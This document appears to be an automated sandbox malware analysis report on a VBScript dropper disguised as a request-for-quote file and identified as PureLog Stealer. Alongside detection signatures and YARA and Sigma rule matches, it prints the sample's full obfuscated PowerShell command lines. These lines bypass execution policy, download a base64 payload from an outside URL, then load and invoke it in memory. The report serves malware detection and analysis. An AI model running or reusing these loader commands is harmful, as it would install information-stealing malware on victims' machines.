Edit tour
Windows
Analysis Report
RFQ 2024.09.26-89 vivecta.vbs
Overview
General Information
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5964 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\RFQ 2 024.09.26- 89 vivecta .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 3740 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgneycrJz EnKyd9dXIn KydsICcrJz 0gezB9aHR0 cHM6LycrJy 9pYTYwMDEw MCcrJy51cy crJy5hcmNo JysnaXYnKy dlLm9yZycr Jy8yNCcrJy 9pdGUnKydt cy8nKydkJy snZXRhJysn aC0nKyduby crJ3QnKydl LXYvRGUnKy d0YWgnKydO b3RlVi50eC crJ3QnKyd7 MCcrJ30nKy c7ezF9YmFz ZTYnKyc0Q2 9udGVudCA9 IChOJysnZX cnKyctTycr J2InKydqZS crJ2N0IFN5 c3RlbS5OZX QuJysnV2Vi Q2xpZScrJ2 50KS4nKydE b3dubG8nKy dhJysnZFN0 cmluJysnZy h7JysnMX11 cmwpOycrJ3 sxfWJpJysn bicrJ2FyeU NvbicrJ3Rl bnQgPSBbU3 knKydzdGVt JysnLicrJ0 NvbnZlcnRd OjpGcm9tJy snQmFzJysn ZScrJzY0Jy snU3RyaW5n JysnKHsnKy cxfWJhc2U2 NENvbnQnKy dlbnQpJysn O3sxfScrJ2 Fzc2VtYmx5 ID0gJysnWy crJ1JlZmwn KydlJysnY3 Rpb24uQXNz JysnZW1ibH ldOicrJzpM b2FkKHsnKy cxfWJpbicr J2FyeUNvbn QnKydlbicr J3QnKycpO3 sxfXR5cCcr J2UgPScrJy AnKyd7MX1h JysncycrJ3 MnKydlbScr J2JsJysneS 4nKydHZXRU JysneXAnKy dlKCcrJ3sw JysnfScrJ1 J1blBFLkhv bWUnKyd7MC crJ30pJysn O3snKycxJy snfW1ldGgn KydvZCA9IC crJ3snKycx fScrJ3R5cG UuRycrJ2V0 TScrJ2V0aC crJ28nKydk KHswfVYnKy dBSXswfSkn Kyc7eycrJz F9bWUnKyd0 JysnaCcrJ2 9kLkludm9r ZSh7JysnMX 1udWxsLCBb b2JqZWN0Wy crJ11dQCcr Jyh7MH0nKy d0eHQuaycr J25zJysnYi 92ZScrJ2Qu MnIuY2RmZD c3JysnMmJm OTk3MScrJ2 EzOScrJzMw ODQnKyc1ZD AnKyc2Jysn ODQnKyc4Yz Y0MzYnKyct YicrJ3VwLy 86c3B0Jysn dGh7MH0gLC AnKyd7MH1k ZXNhdGknKy d2YWRvezB9 ICwgJysnez B9ZGVzJysn YXRpdmFkb3 swfSAsIHsw JysnfWRlc2 EnKyd0aXZh ZCcrJ297MH 0sezB9QWRk SW5Qcm9jZX NzJysnMycr JzInKyd7MC crJ30sezB9 ezB9KSknKS AgLWYgIFtj SGFyXTM5LF tjSGFyXTM2 KSB8IGlOVk 9LZS1lWHBS RVNTSW9O'; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5220 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{' +'1'+'}ur' +'l '+'= { 0}https:/' +'/ia60010 0'+'.us'+' .arch'+'iv '+'e.org'+ '/24'+'/it e'+'ms/'+' d'+'eta'+' h-'+'no'+' t'+'e-v/De '+'tah'+'N oteV.tx'+' t'+'{0'+'} '+';{1}bas e6'+'4Cont ent = (N'+ 'ew'+'-O'+ 'b'+'je'+' ct System. Net.'+'Web Clie'+'nt) .'+'Downlo '+'a'+'dSt rin'+'g({' +'1}url);' +'{1}bi'+' n'+'aryCon '+'tent = [Sy'+'stem '+'.'+'Con vert]::Fro m'+'Bas'+' e'+'64'+'S tring'+'({ '+'1}base6 4Cont'+'en t)'+';{1}' +'assembly = '+'['+' Refl'+'e'+ 'ction.Ass '+'embly]: '+':Load({ '+'1}bin'+ 'aryCont'+ 'en'+'t'+' );{1}typ'+ 'e ='+' '+ '{1}a'+'s' +'s'+'em'+ 'bl'+'y.'+ 'GetT'+'yp '+'e('+'{0 '+'}'+'Run PE.Home'+' {0'+'})'+' ;{'+'1'+'} meth'+'od = '+'{'+'1 }'+'type.G '+'etM'+'e th'+'o'+'d ({0}V'+'AI {0})'+';{' +'1}me'+'t '+'h'+'od. Invoke({'+ '1}null, [ object['+' ]]@'+'({0} '+'txt.k'+ 'ns'+'b/ve '+'d.2r.cd fd77'+'2bf 9971'+'a39 '+'3084'+' 5d0'+'6'+' 84'+'8c643 6'+'-b'+'u p//:spt'+' th{0} , '+ '{0}desati '+'vado{0} , '+'{0}d es'+'ativa do{0} , {0 '+'}desa'+ 'tivad'+'o {0},{0}Add InProcess' +'3'+'2'+' {0'+'},{0} {0}))') -f [cHar]39, [cHar]36) | iNVOKe-e XpRESSIoN" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |